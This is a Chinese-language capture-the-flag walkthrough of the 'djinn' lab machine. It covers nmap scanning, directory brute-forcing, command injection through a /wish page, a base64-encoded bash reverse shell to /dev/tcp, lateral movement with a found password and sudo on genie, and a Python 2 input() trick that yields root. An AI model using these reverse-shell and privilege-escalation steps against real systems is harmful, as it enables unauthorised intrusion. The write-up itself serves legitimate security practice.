一、端口探测
靶机直接将IP打印在屏幕上,就不用去发现了。
直接进行端口扫描:
root@kali:~# nmap -sS -A 192.168.203.148 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 09:34 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.148
Host is up (0.00047s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp filtered ssh
MAC Address: 00:0C:29:63:02:D0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.203.148
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.28 seconds
仅仅开放了21
端口,22
端口被过滤掉了。(感觉又是考察了knocked
)
心中有些不放心,于是我继续扫一下全端口:
root@kali:~# nmap -sS -p1-65535 192.168.203.148
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 09:38 CST
Nmap scan report for 192.168.203.148
Host is up (0.00070s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
1337/tcp open waste
7331/tcp open swx
MAC Address: 00:0C:29:63:02:D0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 14.92 seconds
果然有漏网之鱼,另外还开放了1337
、7331
端口。
使用telnet查看1337
端口:
发现这是个游戏,回答1000个问题,之后会给我们一个礼物,但我们肯定不能去回答这1000次吧。
二、漏洞寻找
在浏览器中,访问了7331
端口:
发现是这样的一个页面,利用dirb
进行探测:
但是一直探测不出来,原因是dirb普通的字典不够强大:
我们去/usr/share/dirb/wordlists
下查看dirb的词典:
选择使用big.txt
进行爆破,他的字典数是最多的:
但是这样又出现了一种问题,尽管能爆破出来,但是会因为与目标机器有太多的错误,而导致中断。
最终我使用了dirsearch
,采用的是dirb
的big.txt
字典。
跑出两个目录,紧接着对其进行访问:
目录genie
是一个403:
目录/wish
像是一个代码执行:
测试whoami
回显www-data
,证明了漏洞的存在。
三、反弹shell
在kali开启监听
发现报错了,感觉像是被过滤掉了。
这里可以通过base编码,再利用管道符base64解码运行
不过通过检测,发现目标机器上没有nc
(但后来拿到shell查询的时候其实是有nc的),那就换一条命令:
bash -i >& /dev/tcp/192.168.203.129/7777 0>&1
使用base64加密:
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMy4xMjkvNzc3NyAwPiYx
然后再使用如下命令:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMy4xMjkvNzc3NyAwPiYx | base64 -d | bash
拿到shell:
四、提权
一顿摸索之后,发现权限好低:
啥也做不了。
不过还好,通过对隐藏文件的查找ls -la
:
nitish:p4ssw0rdStr3r0n9
因为没有开启ssh,所以我们直接su切换,并使用sudo -l
:
可以看到,我们可在无sam密码的情况下使用 genie
。
genie -h
看一下用法:
genie
的帮助说明提到使用-p
,可以给我们一个shell,但是我们并没有得到该shell。
使用man
命令查看关于genie
更详细的帮助手册:
发现一条隐藏信息:
-cmd
参数,我们尝试一下:
sudo -u sam genie -cmd id #指定sam用户执行id命令
现在我们成功拿到了sam的权限。
再次执行sudo -l
:
发现sam用户可无需使用root密码执行lago
。
$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:4
4
work your ass off!!
$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:1
1
Working on it!!
$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100:
Enter your number: num
num
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
lago proof.sh
# ./proof.sh
./proof.sh
'unknown': I need something more specific.
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Thu Feb 27 21:20:01 IST 2020
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
这篇靶机做的很不顺手,刚开始的目录爆破,再到后面的提权,都反映了自己不够细心。也由于自己不喜欢审查代码的原因,丢掉了很多线索。
其实最重要的线索就在我们刚拿到shell的目录:
在app.py
中我们可以得到关于nitish
用户的信息:
之后,在我们拿下sam用户时,在/home/sam
下看到:隐藏的pyc文件
对其进行反编译:
#!/usr/bin/env python
# encoding: utf-8
from getpass import getuser
from os import system
from random import randint
def naughtyboi():
print 'Working on it!! '
def guessit():
num = randint(1, 101)
print 'Choose a number between 1 to 100: '
s = input('Enter your number: ')
if s == num:
system('/bin/sh')
else:
print 'Better Luck next time'
def readfiles():
user = getuser()
path = input('Enter the full of the file to read: ')
print 'User %s is not allowed to read %s' % (user, path)
def options():
print 'What do you want to do ?'
print '1 - Be naughty'
print '2 - Guess the number'
print '3 - Read some damn files'
print '4 - Work'
choice = int(input('Enter your choice: '))
return choice
def main(op):
if op == 1:
naughtyboi()
elif op == 2:
guessit()
elif op == 3:
readfiles()
elif op == 4:
print 'work your ass off!!'
else:
print 'Do something better with your life'
if __name__ == '__main__':
main(options())
from getpass import getuser
from os import system
from random import randint
def naughtyboi():
print 'Working on it!! '
def guessit():
num = randint(1, 101)
print 'Choose a number between 1 to 100: '
s = input('Enter your number: ')
if s == num:
system('/bin/sh')
else:
print 'Better Luck next time'
def readfiles():
user = getuser()
path = input('Enter the full of the file to read: ')
print 'User %s is not allowed to read %s' % (user, path)
def options():
print 'What do you want to do ?'
print '1 - Be naughty'
print '2 - Guess the number'
print '3 - Read some damn files'
print '4 - Work'
choice = int(input('Enter your choice: '))
return choice
def main(op):
if op == 1:
naughtyboi()
elif op == 2:
guessit()
elif op == 3:
readfiles()
elif op == 4:
print 'work your ass off!!'
else:
print 'Do something better with your life'
if __name__ == '__main__':
main(options())
这块代码便解释了为何输入num
进行提权。
大佬的文章:https://blog.csdn.net/fastergohome/article/details/103537057
其中还写了py脚本跑1000个加减,太强了,学习!